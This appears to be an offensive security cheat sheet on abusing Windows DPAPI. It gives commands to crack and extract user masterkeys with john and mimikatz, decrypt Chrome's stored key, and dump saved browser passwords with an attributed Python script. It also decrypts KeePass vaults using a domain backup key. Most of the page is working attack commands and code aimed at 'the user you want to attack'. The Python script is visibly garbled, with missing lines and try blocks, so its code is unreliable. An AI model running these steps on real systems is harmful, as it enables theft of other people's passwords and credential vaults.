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Extract DPAPI Masterkey from AppData

First find the user passwords inside C:\Users\<user>\AppData\Roaming\Microsoft\Protect\<SID>\<MasterkeyFile>

DPAPImk2john --sid <SID> --masterkey <PathToMasterKeyFile> --context local > hash.txt
john --wordlist=<wordlist> hash.txt

Use mimikatz on windows to extract the masterkey after the password has been discovered.

dpapi::masterkey /in:<AbsolutePathtoMasterKeyFile> /sid:<SID> /password:<password> /protected

This master key is used to derive keys for encryption or encrypt other keys instead of just encrypting files directly through DPAPI.

Use a DPAPI Masterkey to Decrypt an Encrypted Blob

The found masterkey can be used to decrypt encrypted data or even other keys which are used for file encryption. Use mimikatz to extract data/keys from an encrypted blob.

dpapi::blob /in:<AbsolutePathtoEncryptedFile> /unprotect /masterkey:<FoundMasterkey> /out:"./decrypted_blob"

Use of DPAPI in Google Chrome

Google Chrome encrypts the key of which is used for password vaults of the users. The encrypted_key inside a JSON file named Local State is an DPAPI encrypted key. Get the key through using jq.

jq .os_crypt.encrypted_key -r AppData/Local/Google/Chrome/User\ Data/\Local\ State

The encrypted_key itself is encrypted through DPAPI. To decrypt it, base64 decode it at first and remove the first 5 characters, which are DPAPI from the decoded string.

jq .os_crypt.encrypted_key -r \
AppData/Local/Google/Chrome/User\ Data/\Local\ State | \
base64 -d | \
cut -c-6- > encrypted_key.dat

This encrypted_key.dat is used to encrypt data inside the sqlite database inside AppData/Local/Google/Chrome/User\ Data/Default/Login\ Data.

dpapi::blob /in:"./encrypted_key.dat" /unprotect /masterkey:<FoundMasterkey> /out:"./decrypted.key"

Decrypt the Database via a modified version of ohyicong, depending on the following circumstances.

  • Modify the secret_key function if you got the key through AppData and cannot log in as the user you want to attack
  • Modify the column names of select query, depending on the version of Chrome
#Full Credits to LimerBoy
import os
import re
import sys
import json
import base64
import sqlite3
import win32crypt
from Cryptodome.Cipher import AES
import shutil
import csv

CHROME_PATH_LOCAL_STATE = os.path.normpath(r"%s\Desktop\AppData\Local\Google\Chrome\User Data\Local State"%(os.environ['USERPROFILE']))
CHROME_PATH = os.path.normpath(r"%s\Desktop\AppData\Local\Google\Chrome\User Data"%(os.environ['USERPROFILE']))

def get_secret_key():
    with open('./decrypted.key', 'rb') as f:

def decrypt_payload(cipher, payload):
    return cipher.decrypt(payload)

def generate_cipher(aes_key, iv):
    return, AES.MODE_GCM, iv)

def decrypt_password(ciphertext, secret_key):
        #(3-a) Initialisation vector for AES decryption
        initialisation_vector = ciphertext[3:15]
        #(3-b) Get encrypted password by removing suffix bytes (last 16 bits)
        #Encrypted password is 192 bits
        encrypted_password = ciphertext[15:-16]
        #(4) Build the cipher to decrypt the ciphertext
        cipher = generate_cipher(secret_key, initialisation_vector)
        decrypted_pass = decrypt_payload(cipher, encrypted_password)
        decrypted_pass = decrypted_pass.decode()
        return decrypted_pass
    except Exception as e:
        print("[ERR] Unable to decrypt, Chrome version <80 not supported. Please check.")
        return ""

def get_db_connection(chrome_path_login_db):
        shutil.copy2(chrome_path_login_db, "Loginvault.db")
        return sqlite3.connect("Loginvault.db")
    except Exception as e:
        print("[ERR] Chrome database cannot be found")
        return None

if __name__ == '__main__':
        #Create Dataframe to store passwords
        with open('decrypted_password.csv', mode='w', newline='', encoding='utf-8') as decrypt_password_file:
            csv_writer = csv.writer(decrypt_password_file, delimiter=',')
            #(1) Get secret key
            secret_key = get_secret_key()
            #Search user profile or default folder (this is where the encrypted login password is stored)
            folders = [element for element in os.listdir(CHROME_PATH) if"^Profile*|^Default$",element)!=None]
            for folder in folders:
            	#(2) Get ciphertext from sqlite database
                chrome_path_login_db = os.path.normpath(r"%s\%s\Login Data"%(CHROME_PATH,folder))
                conn = get_db_connection(chrome_path_login_db)
                if(secret_key and conn):
                    cursor = conn.cursor()
                    cursor.execute("SELECT origin_url, username_value, password_value FROM logins")
                    for index,login in enumerate(cursor.fetchall()):
                        url = login[0]
                        username = login[1]
                        ciphertext = login[2]
                        if(url!="" and username!="" and ciphertext!=""):
                            #(3) Filter the initialisation vector & encrypted password from ciphertext
                            #(4) Use AES algorithm to decrypt the password
                            decrypted_password = decrypt_password(ciphertext, secret_key)
                            print("Sequence: %d"%(index))
                            print("URL: %s\nUser Name: %s\nPassword: %s\n"%(url,username,decrypted_password))
                            #(5) Save into CSV
                    #Close database connection
                    #Delete temp login db
    except Exception as e:
        print("[ERR] %s"%str(e))

Other Tools

  • tjldeneut's dpaping-lab
  • BlackDiverX's unpacked cqtools
  • Use CQTools with care, CQMasterKeyAD.exe does not work correctly. It will drive you mad. Here is the workaround Pressuposition is, you want to decrypt a blob with a masterkey, e.g. Keepass which is saved with windows logon DPAPI
    • Get the pvk backup key from the DC via mimikatz
    • Get the entropy via CQTools/CQDPAPIKeePassDecryptor/CQDPAPIKeePassDBDecryptor.exe
    • Get the encrypted blob
    • Get the user's Masterkey under C:\users\<user>\AppData\Roaming\Microsoft\Protect\<SID>\
    • Use dpapilab-ng's
./  --masterkey=path/to/masterkey/ -k /path/to/backup/key/ntds_capi_0_07ea03b4-3b28-4270-8862-0bc66dacef1a.keyx.rsa.pvk  --entropy_hex=<found entropy> --sid=S-1-5-21-555431066-3599073733-176599750-1125 path/to/blob.bin 
* Use the decrypted blob to 
CQDPAPIKeePassDBDecryptor.exe /k <key> /f <file>.kdbx
  • Open the *.kdbx file